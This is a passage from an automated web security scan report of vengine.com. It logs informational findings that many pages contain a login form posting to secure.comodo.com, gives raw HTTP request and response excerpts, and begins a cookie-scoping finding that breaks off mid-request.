Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.25. http://www.vengine.com/products/best_practices.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/best_practices.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.26. http://www.vengine.com/products/features.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/features.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.27. http://www.vengine.com/products/free_tools.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/free_tools.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.28. http://www.vengine.com/products/overview.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/overview.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.29. http://www.vengine.com/products/prove_it.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/prove_it.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">


Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.30. http://www.vengine.com/products/tour.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/tour.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.31. http://www.vengine.com/products/vengine/eula.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/eula.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.32. http://www.vengine.com/products/vengine/faq.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/faq.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.33. http://www.vengine.com/products/vengine/first_time.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/first_time.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.34. http://www.vengine.com/products/vengine/help.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/help.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.35. http://www.vengine.com/products/vengine/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.36. http://www.vengine.com/products/vengine/options.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/options.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.37. http://www.vengine.com/products/vengine/requirements.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/requirements.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.38. http://www.vengine.com/products/vengine/setup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/setup.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.39. http://www.vengine.com/products/vengine/ssl_feedback.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/ssl_feedback.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.40. http://www.vengine.com/products/vengine/uninstall.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/uninstall.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.41. http://www.vengine.com/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /sitemap.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.42. http://www.vengine.com/support/faq.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/faq.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.43. http://www.vengine.com/support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.44. https://www.vengine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vengine.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:40 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

10. Cookie scoped to parent domain
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
